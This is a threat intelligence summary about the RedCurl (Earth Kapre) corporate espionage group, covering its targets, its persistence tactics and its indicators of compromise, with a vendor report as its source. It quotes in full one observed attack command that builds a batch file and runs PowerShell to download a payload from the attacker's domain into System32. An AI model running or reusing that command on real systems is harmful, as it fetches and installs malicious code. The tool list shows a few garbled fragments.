Earth Kapre, also known as RedCurl, is a sophisticated cyberespionage group that has been active since at least November 2018. This group primarily targets corporate espionage, focusing on document theft from organizations across various sectors, including construction, finance, consulting, retail, insurance, and legal sectors. Their activities span several countries, notably the U.K., Germany, Canada, Norway, Russia, and Ukraine.
Earth Kapre/RedCurl employs a blend of custom malware and publicly available hacking tools to infiltrate target networks and exfiltrate sensitive information. Unlike many cybercriminal groups, they do not rely on ransomware or direct financial theft but instead aim to steal internal corporate documents, such as staff records, court files, and enterprise email histories. The group demonstrates exceptional red teaming skills and a keen ability to bypass traditional antivirus solutions.
Their operational timeline within a target’s network can range from two to six months from initial infection to the final stage of data theft. Their modus operandi deviates from typical cybercriminal activities by avoiding the deployment of backdoors or the use of popular post-exploitation frameworks like CobaltStrike and Meterpreter. Instead, they focus on maintaining a low profile to avoid detection while gathering valuable information.
One of their known IoCs includes the use of the domain “preston[.]melaniebest[.]com” for downloading malicious payloads, including custom versions of “curl.exe” and other utilities designed for data extraction and system manipulation. Their methodology involves sophisticated command execution sequences and registry modifications to establish persistence and evade detection.
The group also utilizes scheduled tasks for persistence and leverages common system tools in unconventional ways to execute their payloads and maintain access to compromised systems. Observations from Trend Micro MDR Threat Intelligence reveal the use of the “curl” command to fetch and execute malicious payloads, further underscoring their preference for stealth and sophistication over brute force.
preston.melaniebest[.]com
23[.]254[.]224[.]79
198[.]252[.]101[.]86
curl.exe
to download malicious payloads:
%COMSPEC% /Q /c echo powershell -c "iwr -Uri http://preston[.]melaniebest[.]com/ms/curl.tmp -OutFile C:\Windows\System32\curl.exe -UseBasicParsing" > \\127.0.0.1\C$\dvPqyh 2^>^&1 > %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c del %TEMP%\KzIMnc.bat
7za.exe
for unpacking or manipulating files.imagepath
.netstat
to verify if port 4419 is open, indicating potential communication with C2 servers or exfiltration attempts.Earth Kapre/RedCurl’s infrastructure includes a variety of compromised servers used for hosting their malicious payloads and command and control activities. Their victimology spans a broad range of sectors, with a notable focus on companies that possess valuable corporate and legal documents.
The group’s success and continued evolution suggest a trend toward more corporate-focused cyberespionage activities, potentially inspiring other cybercriminal entities to adopt similar tactics.
Earth Kapre/RedCurl represents a significant threat to corporations worldwide, with a unique focus on stealthy exfiltration of sensitive information rather than direct financial gain. Their sophisticated use of custom malware, combined with the strategic use of publicly available tools, makes them a formidable adversary. Organizations are advised to adopt a proactive security posture, including advanced threat detection and response capabilities, to mitigate the risk posed by such advanced persistent threats.
For more detailed information and updates on Earth Kapre/RedCurl, please refer to the comprehensive report by Trend Micro MDR Threat Intelligence.
Executive Briefing Document:
Threat Report: Intersection of Criminal Groups and Industrial Espionage